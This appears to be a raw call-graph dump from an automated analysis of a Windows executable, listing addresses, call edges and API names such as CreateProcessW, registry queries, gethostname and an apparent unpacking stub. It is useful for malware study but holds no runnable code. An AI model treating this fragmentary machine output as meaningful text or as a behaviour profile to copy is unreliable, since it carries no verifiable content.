7bfb1e 105878->105880 105879 7bfc56 105879->105875 105884 7bfc6f FreeLibrary 105879->105884 105933 7c0300 105 API calls _free 105880->105933 105881->105856 105881->105863 105881->105875 105881->105881 105919 7c28d9 48 API calls _memmove 105881->105919 105920 7bfc96 60 API calls 2 library calls 105881->105920 105883 7714a0 48 API calls 105883->105887 105884->105875 105886 76d89e 50 API calls 105886->105887 105887->105879 105887->105883 105887->105886 105935 7c0300 105 API calls _free 105887->105935 105889 76b8a7 48 API calls 105888->105889 105890 7c0473 CharLowerBuffW 105889->105890 105891 7b267a 60 API calls 105890->105891 105892 7c0494 105891->105892 105894 76d3d2 48 API calls 105892->105894 105899 7c04cf Mailbox 105892->105899 105895 7c04ac 105894->105895 105896 767f40 48 API calls 105895->105896 105897 7c04c3 105896->105897 105898 76a2fb 48 API calls 105897->105898 105898->105899 105900 7c050b Mailbox 105899->105900 105936 7bfc96 60 API calls 2 library calls 105899->105936 105900->105881 105902 7bf616 105901->105902 105906 7bf66b 105901->105906 105903 78010a 48 API calls 105902->105903 105905 7bf638 105903->105905 105904 78010a 48 API calls 105904->105905 105905->105904 105905->105906 105907 7c0719 105906->105907 105908 7c0944 Mailbox 105907->105908 105914 7c073c _strcat _wcscpy __wsetenvp 105907->105914 105908->105868 105909 76d00b 58 API calls 105909->105914 105910 76cdb4 48 API calls 105910->105914 105911 7684a6 81 API calls 105911->105914 105912 7845ec 47 API calls std::exception::_Copy_str 105912->105914 105914->105908 105914->105909 105914->105910 105914->105911 105914->105912 105937 7a8932 50 API calls __wsetenvp 105914->105937 105917 77f941 105915->105917 105916 77f9d9 select 105918 77f9a7 105916->105918 105917->105916 105917->105918 105918->105871 105918->105872 105919->105881 105920->105881 105921->105877 105923 763334 105922->105923 105925 763339 Mailbox 105922->105925 105938 76342c 48 API calls 105923->105938 105931 763347 105925->105931 105939 76346e 48 API calls 105925->105939 105927 78010a 48 API calls 105929 7633d8 105927->105929 105928 763422 105928->105876 105930 78010a 48 API calls 105929->105930 105932 7633e3 105930->105932 105931->105927 105931->105928 105932->105876 105933->105887 105934->105860 105935->105887 105936->105900 105937->105914 105938->105925 105939->105931 105940->104301 105949 7bae3b 105941->105949 105944 7bad05 Mailbox 105945 7bad31 htons 105944->105945 105946 7bad1b 105944->105946 105945->105946 105946->104309 105948 7ad7f2 105947->105948 105948->104316 105950 76a6d4 48 API calls 105949->105950 105951 7bae49 105950->105951 105954 7bae79 WideCharToMultiByte 105951->105954 105953 7bacf3 inet_addr 105953->105944 105955 7bae9d 105954->105955 105956 7baea7 105954->105956 105957 77f324 48 API calls 105955->105957 105958 78010a 48 API calls 105956->105958 105961 7baea5 105957->105961 105959 7baeae WideCharToMultiByte 105958->105959 105960 77f2d0 48 API calls 105959->105960 105960->105961 105961->105953 105963 7c23eb _memset 105962->105963 105964 7c2428 105963->105964 105965 7c2452 105963->105965 105966 76cdb4 48 API calls 105964->105966 105969 76cdb4 48 API calls 105965->105969 105970 7c2476 105965->105970 105967 7c2433 105966->105967 105967->105970 105972 76cdb4 48 API calls 105967->105972 105968 7c24b0 105974 7684a6 81 API calls 105968->105974 105971 7c2448 105969->105971 105970->105968 105973 76cdb4 48 API calls 105970->105973 105976 76cdb4 48 API calls 105971->105976 105972->105971 105973->105968 105975 7c24d4 105974->105975 105977 763bcf 48 API calls 105975->105977 105976->105970 105978 7c24de 105977->105978 105979 7c24e8 105978->105979 105980 7c25a1 105978->105980 105981 7684a6 81 API calls 105979->105981 105982 7c25d3 GetCurrentDirectoryW 105980->105982 105985 7684a6 81 API calls 105980->105985 105983 7c24f9 105981->105983 105984 78010a 48 API calls 105982->105984 105986 763bcf 48 API calls 105983->105986 105987 7c25f8 GetCurrentDirectoryW 105984->105987 105988 7c25b8 105985->105988 105989 7c2503 105986->105989 105990 7c2605 105987->105990 105991 763bcf 48 API calls 105988->105991 105992 7684a6 81 API calls 105989->105992 105996 76ca8e 48 API calls 105990->105996 106000 7c263e 105990->106000 105993 7c25c2 __wsetenvp 105991->105993 105994 7c2514 105992->105994 105993->105982 105993->106000 105995 763bcf 48 API calls 105994->105995 105997 7c251e 105995->105997 105998 7c261e 105996->105998 106001 7684a6 81 API calls 105997->106001 106002 76ca8e 48 API calls 105998->106002 105999 7c268a 106007 7c274c CreateProcessW 105999->106007 106008 7c26c1 105999->106008 106000->105999 106040 7aa17a 8 API calls 106000->106040 106004 7c252f 106001->106004 106005 7c262e 106002->106005 106009 763bcf 48 API calls 106004->106009 106010 76ca8e 48 API calls 106005->106010 106006 7c2655 106041 7aa073 8 API calls 106006->106041 106020 7c276b 106007->106020 106043 79bc90 69 API calls 106008->106043 106013 7c2539 106009->106013 106010->106000 106015 7c256f GetSystemDirectoryW 106013->106015 106018 7684a6 81 API calls 106013->106018 106014 7c2670 106042 7aa102 8 API calls 106014->106042 106017 78010a 48 API calls 106015->106017 106021 7c2594 GetSystemDirectoryW 106017->106021 106019 7c2550 106018->106019 106022 763bcf 48 API calls 106019->106022 106024 7c27bd CloseHandle 106020->106024 106025 7c2780 106020->106025 106021->105990 106023 7c255a __wsetenvp 106022->106023 106023->105990 106023->106015 106026 7c27cb 106024->106026 106033 7c27f5 106024->106033 106028 7c2791 GetLastError 106025->106028 106044 7a9d09 CloseHandle Mailbox 106026->106044 106027 7c27fb 106030 7c27a5 106027->106030 106028->106030 106045 7a9b29 CloseHandle 106030->106045 106033->106027 106036 7c2827 CloseHandle 106033->106036 106036->106030 106037 7c1f2b 106037->104077 106039 7c26df __wsetenvp 106039->106020 106040->106006 106041->106014 106042->105999 106043->106039 106045->106037 106046->104334 106047->104336 106049 77f057 106048->106049 106050 77f069 106048->106050 106051 77f063 106049->106051 106052 77f05d 106049->106052 106053 76c4cd 48 API calls 106050->106053 106054 76a6d4 48 API calls 106051->106054 106055 76a6d4 48 API calls 106052->106055 106068 7a64f5 106053->106068 106057 7a668b 106054->106057 106056 77f081 106055->106056 106077 764c4f 106056->106077 106059 764c4f 50 API calls 106057->106059 106062 7a6699 106059->106062 106070 7a66a9 Mailbox 106062->106070 106085 7a6765 50 API calls 106062->106085 106063 7d49b2 106064 7a6524 106064->104372 106065 76c610 50 API calls 106069 77f0a3 Mailbox 106065->106069 106068->106064 106083 7a649b ReadFile SetFilePointerEx 106068->106083 106084 76bd2f 48 API calls _memmove 106068->106084 106069->104372 106070->104372 106071->104349 106072->104377 106073->104346 106074->104353 106075->104368 106076->104375 106078 77f324 48 API calls 106077->106078 106081 764c60 106078->106081 106079 764c95 106079->106063 106079->106065 106080 764ca0 2 API calls 106080->106081 106081->106079 106081->106080 106086 764d29 106081->106086 106083->106068 106084->106068 106085->106070 106087 7d45cf 106086->106087 106088 764d3d 106086->106088 106090 76a6f8 48 API calls 106087->106090 106095 764d67 106088->106095 106092 7d45da 106090->106092 106091 764d49 106091->106081 106093 78010a 48 API calls 106092->106093 106094 7d45ef _memmove 106093->106094 106096 764d7d 106095->106096 106099 764d78 _memmove 106095->106099 106097 7d4703 106096->106097 106098 78010a 48 API calls 106096->106098 106098->106099 106099->106091 106100->104394 106101->104409 106102->104409 106103->104421 106104->104414 106105->104409 106106->104411 106108 7b6b42 106107->106108 106109 7b6b25 GetWindowRect 106107->106109 106110 7b6b5c 106108->106110 106111 7b6b52 ClientToScreen 106108->106111 106109->106110 106110->104428 106110->104431 106111->106110 106112->104434 106113->104438 106114->104476 106115->104509 106116->104514 106117->104528 106118 7d4ddc 106119 774472 106118->106119 106120 7d4de6 VariantClear 106118->106120 106120->106119 106121 7d83bc 106141 77308b 106121->106141 106122 7d84b0 106126 7732b9 106122->106126 106151 7ad520 86 API calls 4 library calls 106122->106151 106124 77366d 106124->106126 106152 7ad520 86 API calls 4 library calls 106124->106152 106127 7d8145 VariantClear 106127->106141 106128 773665 106147 7ad520 86 API calls 4 library calls 106128->106147 106130 76fa40 415 API calls 106130->106141 106131 7bd154 48 API calls 106131->106141 106132 7d84a4 106150 7ad520 86 API calls 4 library calls 106132->106150 106135 76c935 48 API calls 106135->106141 106137 7d848d 106149 7ad520 86 API calls 4 library calls 106137->106149 106140 763320 48 API calls 106140->106141 106141->106122 106141->106124 106141->106126 106141->106127 106141->106128 106141->106130 106141->106131 106141->106132 106141->106135 106141->106137 106141->106140 106142 7d8478 106141->106142 106144 76203a 415 API calls 106141->106144 106145 79a599 InterlockedDecrement 106141->106145 106146 76346e 48 API calls 106141->106146 106148 7ad520 86 API calls 4 library calls 106142->106148 106144->106141 106145->106141 106146->106141 106147->106126 106148->106126 106149->106126 106150->106122 106151->106126 106152->106126 106153 7dc05b 106154 7dc05d 106153->106154 106157 7a78ee WSAStartup 106154->106157 106156 7dc066 106156->106156 106158 7a7917 gethostname gethostbyname 106157->106158 106160 7a79b1 _wcscpy 106157->106160 106159 7a793a _memmove 106158->106159 106158->106160 106161 7a7970 inet_ntoa 106159->106161 106165 7a7952 _wcscpy 106159->106165 106160->106156 106163 7a7989 _strcat 106161->106163 106162 7a79a9 WSACleanup 106162->106160 106166 7a8553 106163->106166 106165->106162 106169 7a8561 106166->106169 106170 7a8565 _strlen 106166->106170 106167 7a8574 MultiByteToWideChar 106168 7a858a 106167->106168 106167->106169 106171 78010a 48 API calls 106168->106171 106169->106165 106170->106167 106172 7a85a6 MultiByteToWideChar 106171->106172 106172->106169 106173 7d1edb 106178 76131c 106173->106178 106179 76133e 106178->106179 106212 761624 106179->106212 106184 76d3d2 48 API calls 106185 76137e 106184->106185 106186 76d3d2 48 API calls 106185->106186 106187 761388 106186->106187 106188 76d3d2 48 API calls 106187->106188 106189 761392 106188->106189 106190 76d3d2 48 API calls 106189->106190 106191 7613d8 106190->106191 106192 76d3d2 48 API calls 106191->106192 106193 7614bb 106192->106193 106220 761673 106193->106220 106258 7617e0 106212->106258 106215 767e53 48 API calls 106216 761344 106215->106216 106217 7616db 106216->106217 106272 761867 6 API calls 106217->106272 106219 761374 106219->106184 106221 76d3d2 48 API calls 106220->106221 106222 761683 106221->106222 106223 76d3d2 48 API calls 106222->106223 106224 76168b 106223->106224 106273 767d70 106224->106273 106227 767d70 48 API calls 106228 76169b 106227->106228 106229 76d3d2 48 API calls 106228->106229 106230 7616a6 106229->106230 106265 7617fc 106258->106265 106261 7617fc 48 API calls 106262 7617f0 106261->106262 106263 76d3d2 48 API calls 106262->106263 106264 76165b 106263->106264 106264->106215 106266 76d3d2 48 API calls 106265->106266 106267 761807 106266->106267 106268 76d3d2 48 API calls 106267->106268 106269 76180f 106268->106269 106270 76d3d2 48 API calls 106269->106270 106271 7617e8 106270->106271 106271->106261 106272->106219 106274 76d3d2 48 API calls 106273->106274 106275 767d79 106274->106275 106276 76d3d2 48 API calls 106275->106276 106277 761693 106276->106277 106277->106227 106280 8cb0c0 106281 8cb0d0 106280->106281 106282 8cb1ea LoadLibraryA 106281->106282 106285 8cb22f VirtualProtect VirtualProtect 106281->106285 106283 8cb201 106282->106283 106283->106281 106287 8cb213 GetProcAddress 106283->106287 106286 8cb294 106285->106286 106286->106286 106287->106283 106288 8cb229 ExitProcess 106287->106288 106289 771118 106290 77e016 50 API calls 106289->106290 106291 77112e 106290->106291 106292 7dabeb 106291->106292 106293 771148 106291->106293 106357 77cf79 49 API calls 106292->106357 106295 773680 415 API calls 106293->106295 106335 76fad8 Mailbox _memmove 106295->106335 106297 7dac2a 106300 7dac4a Mailbox 106297->106300 106358 7aba5d 48 API calls 106297->106358 106298 7db628 Mailbox 106361 7ad520 86 API calls 4 library calls 106300->106361 106303 77105e 106311 76c935 48 API calls 106303->106311 106304 771063 106363 7ad520 86 API calls 4 library calls 106304->106363 106305 76c935 48 API calls 106305->106335 106307 770dee 106309 76d89e 50 API calls 106307->106309 106308 770dfa 106314 76d89e 50 API calls 106308->106314 106309->106308 106310 7db772 106365 7ad520 86 API calls 4 library calls 106310->106365 106323 76fbf1 Mailbox 106311->106323 106312 76f6d0 415 API calls 106312->106335 106315 770e83 106314->106315 106322 76caee 48 API calls 106315->106322 106316 770119 106364 7ad520 86 API calls 4 library calls 106316->106364 106318 76d3d2 48 API calls 106318->106335 106319 7db7d2 106320 79a599 InterlockedDecrement 106320->106335 106321 781b2a 52 API calls __cinit 106321->106335 106331 7710f1 Mailbox 106322->106331 106327 771230 106327->106323 106362 7ad520 86 API calls 4 library calls 106327->106362 106328 78010a 48 API calls 106328->106335 106329 76fa40 415 API calls 106329->106335 106360 7ad520 86 API calls 4 library calls 106331->106360 106333 7db583 106359 7ad520 86 API calls 4 library calls 106333->106359 106335->106303 106335->106304 106335->106305 106335->106307 106335->106308 106335->106310 106335->106312 106335->106315 106335->106316 106335->106318 106335->106320 106335->106321 106335->106323 106335->106327 106335->106328 106335->106329 106335->106331 106335->106333 106336 7b013f 87 API calls 106335->106336 106337 7c1f19 132 API calls 106335->106337 106338 7c0bfa 129 API calls 106335->106338 106339 77f03e 2 API calls 106335->106339 106340 7bb74b 415 API calls 106335->106340 106341 7c798d 109 API calls 106335->106341 106342 7c30ad 93 API calls 106335->106342 106343 7c804e 113 API calls 106335->106343 106344 77dd84 3 API calls 106335->106344 106345 7c17aa 87 API calls 106335->106345 106346 77f461 98 API calls 106335->106346 106347 7b9122 91 API calls 106335->106347 106348 7c10e5 82 API calls 106335->106348 106349 77ef0d 94 API calls 106335->106349 106350 7b92c0 88 API calls 106335->106350 106351 7b8065 55 API calls 106335->106351 106352 771620 59 API calls Mailbox 106335->106352 106353 7bee52 82 API calls 2 library calls 106335->106353 106354 7bef9d 90 API calls Mailbox 106335->106354 106355 7ab020 48 API calls 106335->106355 106356 7be713 415 API calls Mailbox 106335->106356 106336->106335 106337->106335 106338->106335 106339->106335 106340->106335 106341->106335 106342->106335 106343->106335 106344->106335 106345->106335 106346->106335 106347->106335 106348->106335 106349->106335 106350->106335 106351->106335 106352->106335 106353->106335 106354->106335 106355->106335 106356->106335 106357->106297 106358->106300 106359->106331 106360->106323 106361->106298 106362->106304 106363->106316 106364->106310 106365->106319 106366 7d1eed 106371 77e975 106366->106371 106368 7d1f01 106387 781b2a 52 API calls __cinit 106368->106387 106370 7d1f0b 106372 78010a 48 API calls 106371->106372 106373 77ea27 GetModuleFileNameW 106372->106373 106374 78297d __wsplitpath 47 API calls 106373->106374 106375 77ea5b _wcsncat 106374->106375 106388 782bff 106375->106388 106378 78010a 48 API calls 106379 77ea94 _wcscpy 106378->106379 106380 76d3d2 48 API calls 106379->106380 106381 77eacf 106380->106381 106391 77eb05 106381->106391 106383 77eae0 Mailbox 106383->106368 106384 77eada _wcscat __wsetenvp _wcsncpy 106384->106383 106385 78010a 48 API calls 106384->106385 106386 76a4f6 48 API calls 106384->106386 106385->106384 106386->106384 106387->106370 106405 78aab9 106388->106405 106392 76c4cd 48 API calls 106391->106392 106393 77eb14 RegOpenKeyExW 106392->106393 106394 77eb35 106393->106394 106395 7d4b17 RegQueryValueExW 106393->106395 106394->106384 106396 7d4b91 RegCloseKey 106395->106396 106397 7d4b30 106395->106397 106398 78010a 48 API calls 106397->106398 106399 7d4b49 106398->106399 106400 764bce 48 API calls 106399->106400 106401 7d4b53 RegQueryValueExW 106400->106401 106402 7d4b6f 106401->106402 106403 7d4b86 106401->106403 106404 767e53 48 API calls 106402->106404 106403->106396 106404->106403 106406 78aaca 106405->106406 106407 78abc6 106405->106407 106406->106407 106412 78aad5 106406->106412 106415 78889e 47 API calls __getptd_noexit 106407->106415 106411 77ea8a 106411->106378 106412->106411 106414 78889e 47 API calls __getptd_noexit 106412->106414 106413 78abbb 106416 787aa0 8 API calls __cftof2_l 106413->106416 106414->106413 106415->106413 106416->106411 106417 7629c2 106418 7629cb 106417->106418 106419 762a48 106418->106419 106420 7629e9 106418->106420 106421 762a46 106418->106421 106425 762a4e 106419->106425 106426 7d2307 106419->106426 106422 7629f6 106420->106422 106423 762aac PostQuitMessage 106420->106423 106424 762a2b NtdllDefWindowProc_W 106421->106424 106428 7d238f 106422->106428 106429 762a01 106422->106429 106430 762a39 106423->106430 106424->106430 106431 762a76 SetTimer RegisterClipboardFormatW 106425->106431 106432 762a53 106425->106432 106472 76322e 16 API calls 106426->106472 106478 7a57fb 60 API calls _memset 106428->106478 106434 762ab6 106429->106434 106435 762a09 106429->106435 106431->106430 106436 762a9f CreatePopupMenu 106431->106436 106438 7d22aa 106432->106438 106439 762a5a KillTimer 106432->106439 106433 7d232e 106473 77ec33 415 API calls Mailbox 106433->106473 106462 761e58 106434->106462 106441 762a14 106435->106441 106442 7d2374 106435->106442 106436->106430 106445 7d22af 106438->106445 106446 7d22e3 MoveWindow 106438->106446 106469 762b94 Shell_NotifyIconW _memset 106439->106469 106448 762a1f 106441->106448 106449 7d235f 106441->106449 106442->106424 106477 79b31f 48 API calls 106442->106477 106443 7d23a1 106443->106424 106443->106430 106450 7d22b3 106445->106450 106451 7d22d2 SetFocus 106445->106451 106446->106430 106448->106424 106474 762b94 Shell_NotifyIconW _memset 106448->106474 106476 7a5fdb 70 API calls _memset 106449->106476 106450->106448 106455 7d22bc 106450->106455 106451->106430 106452 762a6d 106470 762ac7 DeleteObject DestroyWindow Mailbox 106452->106470 106471 76322e 16 API calls 106455->106471 106458 7d236f 106458->106430 106460 7d2353 106475 763598 67 API calls _memset 106460->106475 106463 761ef1 106462->106463 106464 761e6f _memset 106462->106464 106463->106430 106479 7638e4 106464->106479 106466 761eda KillTimer SetTimer 106466->106463 106467 761e96 106467->106466 106468 7d4518 Shell_NotifyIconW 106467->106468 106468->106466 106469->106452 106470->106430 106471->106430 106472->106433 106473->106448 106474->106460 106475->106421 106476->106458 106477->106421 106478->106443 106480 7639d5 Mailbox 106479->106480 106481 763900 106479->106481 106480->106467 106501 767b6e 48 API calls 106481->106501 106483 76390e 106484 7d453f LoadStringW 106483->106484 106485 76391b 106483->106485 106488 7d4559 106484->106488 106486 767e53 48 API calls 106485->106486 106487 763930 106486->106487 106487->106488 106489 763941 106487->106489 106503 7639e8 48 API calls 2 library calls 106488->106503 106491 7639da 106489->106491 106492 76394b 106489->106492 106493 76c935 48 API calls 106491->106493 106502 7639e8 48 API calls 2 library calls 106492->106502 106499 763956 _memset _wcscpy 106493->106499 106495 7d4564 106496 7d4578 106495->106496 106495->106499 106504 7639e8 48 API calls 2 library calls 106496->106504 106498 7d4586 106500 7639ba Shell_NotifyIconW 106499->106500 106500->106480 106501->106483 106502->106499 106503->106495 106504->106498 106505 7d1e8b 106510 77e44f 106505->106510 106509 7d1e9a 106511 78010a 48 API calls 106510->106511 106512 77e457 106511->106512 106514 77e46b 106512->106514 106518 77e74b 106512->106518 106517 781b2a 52 API calls __cinit 106514->106517 106517->106509 106519 77e463 106518->106519 106520 77e754 106518->106520 106522 77e47b 106519->106522 106550 781b2a 52 API calls __cinit 106520->106550 106523 76d3d2 48 API calls 106522->106523 106524 77e492 GetVersionExW 106523->106524 106525 767e53 48 API calls 106524->106525 106526 77e4d5 106525->106526 106551 77e5f8 106526->106551 106529 77e617 48 API calls 106535 77e4e9 106529->106535 106531 7d29f9 106533 77e576 106537 77e59e 106533->106537 106538 77e5ec GetSystemInfo 106533->106538 106534 77e55f GetCurrentProcess 106564 77e70e LoadLibraryA GetProcAddress 106534->106564 106535->106531 106555 77e6d1 106535->106555 106558 77e694 106537->106558 106539 77e5c9 106538->106539 106541 77e5d7 FreeLibrary 106539->106541 106542 77e5dc 106539->106542 106541->106542 106542->106514 106544 77e5e4 GetSystemInfo 106546 77e5be 106544->106546 106545 77e5b4 106561 77e437 106545->106561 106546->106539 106549 77e5c4 FreeLibrary 106546->106549 106549->106539 106550->106519 106552 77e601 106551->106552 106553 76a2fb 48 API calls 106552->106553 106554 77e4dd 106553->106554 106554->106529 106565 77e6e3 106555->106565 106569 77e6a6 106558->106569 106562 77e694 2 API calls 106561->106562 106563 77e43f GetNativeSystemInfo 106562->106563 106563->106546 106564->106533 106566 77e55b 106565->106566 106567 77e6ec LoadLibraryA 106565->106567 106566->106533 106566->106534 106567->106566 106568 77e6fd GetProcAddress 106567->106568 106568->106566 106570 77e5ac 106569->106570 106571 77e6af LoadLibraryA 106569->106571 106570->106544 106570->106545 106571->106570 106572 77e6c0 GetProcAddress 106571->106572 106572->106570 106573 7d1eca 106578 77be17 106573->106578 106577 7d1ed9 106579 76d3d2 48 API calls 106578->106579 106580 77be85 106579->106580 106586 77c929 106580->106586 106582 77bf22 106584 77bf3e 106582->106584 106589 77c8b7 48 API calls _memmove 106582->106589 106585 781b2a 52 API calls __cinit 106584->106585 106585->106577 106590 77c955 106586->106590 106589->106582 106591 77c948 106590->106591 106592 77c962 106590->106592 106591->106582 106592->106591 106593 77c969 RegOpenKeyExW 106592->106593 106593->106591 106594 77c983 RegQueryValueExW 106593->106594 106595 77c9a4 106594->106595 106596 77c9b9 RegCloseKey 106594->106596 106595->106596 106596->106591 106597 7dbc25 106598 7dbc27 106597->106598 106601 7a79f8 SHGetFolderPathW 106598->106601 106602 767e53 48 API calls 106601->106602 106603 7a7a25 106602->106603 106604 786a80 106605 786a8c ___lock_fhandle 106604->106605 106641 788b7b GetStartupInfoW 106605->106641 106607 786a91 106643 78a937 GetProcessHeap 106607->106643 106609 786ae9 106610 786af4 106609->106610 106728 786bd0 47 API calls 3 library calls 106609->106728 106644 7887d7 106610->106644 106613 786afa 106614 786b05 __RTC_Initialize 106613->106614 106729 786bd0 47 API calls 3 library calls 106613->106729 106665 78ba66 106614->106665 106617 786b14 106618 786b20 GetCommandLineW 106617->106618 106730 786bd0 47 API calls 3 library calls 106617->106730 106684 793c2d GetEnvironmentStringsW 106618->106684 106621 786b1f 106621->106618 106628 786b45 106697 793a64 106628->106697 106629 786b56 106711 781db5 106629->106711 106632 786b5e 106633 786b69 __wwincmdln 106632->106633 106733 781d7b 47 API calls 3 library calls 106632->106733 106715 763682 106633->106715 106642 788b91 106641->106642 106642->106607 106643->106609 106736 781e5a 30 API calls 2 library calls 106644->106736 106646 7887dc 106737 788ab3 InitializeCriticalSectionAndSpinCount 106646->106737 106648 7887e1 106649 7887e5 106648->106649 106739 788afd TlsAlloc 106648->106739 106738 78884d 50 API calls 2 library calls 106649->106738 106652 7887f7 106652->106649 106654 788802 106652->106654 106653 7887ea 106653->106613 106740 787616 106654->106740 106657 788844 106748 78884d 50 API calls 2 library calls 106657->106748 106660 788823 106660->106657 106662 788829 106660->106662 106661 788849 106661->106613 106747 788724 47 API calls 4 library calls 106662->106747 106664 788831 GetCurrentThreadId 106664->106613 106666 78ba72 ___lock_fhandle 106665->106666 106757 788984 106666->106757 106668 78ba79 106669 787616 __calloc_crt 47 API calls 106668->106669 106670 78ba8a 106669->106670 106671 78baf5 GetStartupInfoW 106670->106671 106673 78ba95 ___lock_fhandle @_EH4_CallFilterFunc@8 106670->106673 106678 78bc33 106671->106678 106681 78bb0a 106671->106681 106672 78bcf7 106764 78bd0b RtlLeaveCriticalSection _doexit 106672->106764 106673->106617 106675 78bc7c GetStdHandle 106675->106678 106676 787616 __calloc_crt 47 API calls 106676->106681 106677 78bc8e GetFileType 106677->106678 106678->106672 106678->106675 106678->106677 106680 78bcbb InitializeCriticalSectionAndSpinCount 106678->106680 106679 78bb58 106679->106678 106682 78bb98 InitializeCriticalSectionAndSpinCount 106679->106682 106683 78bb8a GetFileType 106679->106683 106680->106678 106681->106676 106681->106678 106681->106679 106682->106679 106683->106679 106683->106682 106685 793c3e 106684->106685 106686 786b30 106684->106686 106803 787660 47 API calls std::exception::_Copy_str 106685->106803 106691 79382b GetModuleFileNameW 106686->106691 106689 793c64 _memmove 106690 793c7a FreeEnvironmentStringsW 106689->106690 106690->106686 106692 79385f _wparse_cmdline 106691->106692 106693 786b3a 106692->106693 106694 793899 106692->106694 106693->106628 106731 781d7b 47 API calls 3 library calls 106693->106731 106804 787660 47 API calls std::exception::_Copy_str 106694->106804 106696 79389f _wparse_cmdline 106696->106693 106698 793a7d __wsetenvp 106697->106698 106702 786b4b 106697->106702 106699 787616 __calloc_crt 47 API calls 106698->106699 106704 793aa6 __wsetenvp 106699->106704 106700 793afd 106701 7828ca _free 47 API calls 106700->106701 106701->106702 106702->106629 106732 781d7b 47 API calls 3 library calls 106702->106732 106703 787616 __calloc_crt 47 API calls 106703->106704 106704->106700 106704->106702 106704->106703 106705 793b22 106704->106705 106708 793b39 106704->106708 106805 793317 47 API calls __cftof2_l 106704->106805 106706 7828ca _free 47 API calls 106705->106706 106706->106702 106806 787ab0 IsProcessorFeaturePresent 106708->106806 106712 781dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 106711->106712 106713 781e00 __IsNonwritableInCurrentImage 106712->106713 106829 781b2a 52 API calls __cinit 106712->106829 106713->106632 106716 7d23b5 106715->106716 106717 76369c 106715->106717 106728->106610 106729->106614 106730->106621 106736->106646 106737->106648 106738->106653 106739->106652 106743 78761d 106740->106743 106742 78765a 106742->106657 106746 788b59 TlsSetValue 106742->106746 106743->106742 106744 78763b Sleep 106743->106744 106749 793e5a 106743->106749 106745 787652 106744->106745 106745->106742 106745->106743 106746->106660 106747->106664 106748->106661 106750 793e65 106749->106750 106754 793e80 __calloc_impl 106749->106754 106751 793e71 106750->106751 106750->106754 106756 78889e 47 API calls __getptd_noexit 106751->106756 106752 793e90 RtlAllocateHeap 106752->106754 106755 793e76 106752->106755 106754->106752 106754->106755 106755->106743 106756->106755 106758 7889a8 RtlEnterCriticalSection 106757->106758 106759 788995 106757->106759 106758->106668 106765 788a0c 106759->106765 106761 78899b 106761->106758 106789 781d7b 47 API calls 3 library calls 106761->106789 106764->106673 106766 788a18 ___lock_fhandle 106765->106766 106767 788a39 106766->106767 106768 788a21 106766->106768 106770 788aa1 ___lock_fhandle 106767->106770 106783 788a37 106767->106783 106790 788e52 47 API calls 2 library calls 106768->106790 106770->106761 106771 788a26 106791 788eb2 47 API calls 8 library calls 106771->106791 106774 788a4d 106776 788a63 106774->106776 106777 788a54 106774->106777 106775 788a2d 106792 781d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 106775->106792 106779 788984 __lock 46 API calls 106776->106779 106794 78889e 47 API calls __getptd_noexit 106777->106794 106782 788a6a 106779->106782 106781 788a59 106781->106770 106784 788a79 InitializeCriticalSectionAndSpinCount 106782->106784 106785 788a8e 106782->106785 106783->106767 106793 787660 47 API calls std::exception::_Copy_str 106783->106793 106786 788a94 106784->106786 106795 7828ca 106785->106795 106801 788aaa RtlLeaveCriticalSection _doexit 106786->106801 106790->106771 106791->106775 106793->106774 106794->106781 106796 7828fc _free 106795->106796 106797 7828d3 RtlFreeHeap 106795->106797 106796->106786 106797->106796 106798 7828e8 106797->106798 106802 78889e 47 API calls __getptd_noexit 106798->106802 106800 7828ee GetLastError 106800->106796 106801->106770 106802->106800 106803->106689 106804->106696 106805->106704 106807 787abb 106806->106807 106812 787945 106807->106812 106813 78795f _memset __call_reportfault 106812->106813 106814 78797f IsDebuggerPresent 106813->106814 106829->106713 107595 7dc146 GetUserNameW 107596 76e849 107599 7726c0 107596->107599 107598 76e852 107600 7d862d 107599->107600 107601 77273b 107599->107601 107721 7ad520 86 API calls 4 library calls 107600->107721 107606 772adc 107601->107606 107607 77277c 107601->107607 107617 77279a 107601->107617 107603 7d863e 107722 7ad520 86 API calls 4 library calls 107603->107722 107604 772a84 107614 76d380 55 API calls 107604->107614 107605 7727cf 107605->107603 107608 7727db 107605->107608 107720 76d349 53 API calls 107606->107720 107609 7728f6 107607->107609 107716 76d500 53 API calls __cinit 107607->107716 107611 7727ef 107608->107611 107624 7d865a 107608->107624 107660 772900 107609->107660 107731 76cf97 58 API calls 107609->107731 107615 772806 107611->107615 107616 7d86c9 107611->107616 107618 772aab 107614->107618 107619 76fa40 415 API calls 107615->107619 107623 76fa40 415 API calls 107616->107623 107658 7d8ac9 107616->107658 107617->107604 107617->107605 107620 772914 107617->107620 107622 76d2d2 53 API calls 107618->107622 107629 77281d 107619->107629 107634 76cdb4 48 API calls 107620->107634 107622->107620 107625 7d86ee 107623->107625 107624->107616 107631 7729ec 107624->107631 107723 7bf211 415 API calls 107624->107723 107724 7bf4df 415 API calls 107624->107724 107625->107631 107633 76d89e 50 API calls 107625->107633 107639 7d870a 107625->107639 107627 7728ac 107636 7728cc 107627->107636 107730 76cf97 58 API calls 107627->107730 107628 7d8980 107732 7ad520 86 API calls 4 library calls 107628->107732 107629->107631 107632 772836 107629->107632 107638 76c935 48 API calls 107629->107638 107631->107598 107637 76fa40 415 API calls 107632->107637 107632->107658 107633->107639 107640 77296e 107634->107640 107636->107609 107717 76cf97 58 API calls 107636->107717 107661 77287c 107637->107661 107638->107632 107646 7d878d 107639->107646 107725 76346e 48 API calls 107639->107725 107640->107631 107648 772984 107640->107648 107652 7d8a97 107640->107652 107654 7d89b4 107640->107654 107643 7d883f 107728 7bc235 415 API calls Mailbox 107643->107728 107646->107643 107647 7d882d 107646->107647 107726 7a4e71 53 API calls __cinit 107646->107726 107649 76ca8e 48 API calls 107647->107649 107648->107652 107718 7741fc 84 API calls 107648->107718 107649->107643 107650 7d8888 107650->107629 107655 7d888c 107650->107655 107652->107631 107736 764b02 50 API calls 107652->107736 107702 7bbf80 107654->107702 107729 7ad520 86 API calls 4 library calls 107655->107729 107737 7ad520 86 API calls 4 library calls 107658->107737 107660->107620 107660->107628 107661->107627 107661->107631 107664 76fa40 415 API calls 107661->107664 107662 7729b8 107665 7d8a7e 107662->107665 107719 7741fc 84 API calls 107662->107719 107671 7d88ff 107664->107671 107735 77ee93 84 API calls 107665->107735 107666 7d8725 107666->107647 107678 7714a0 48 API calls 107666->107678 107667 7d89f3 107679 7d8a01 107667->107679 107680 7d8a42 107667->107680 107668 7d87ca 107669 7d8813 107668->107669 107673 7684a6 81 API calls 107668->107673 107675 76d89e 50 API calls 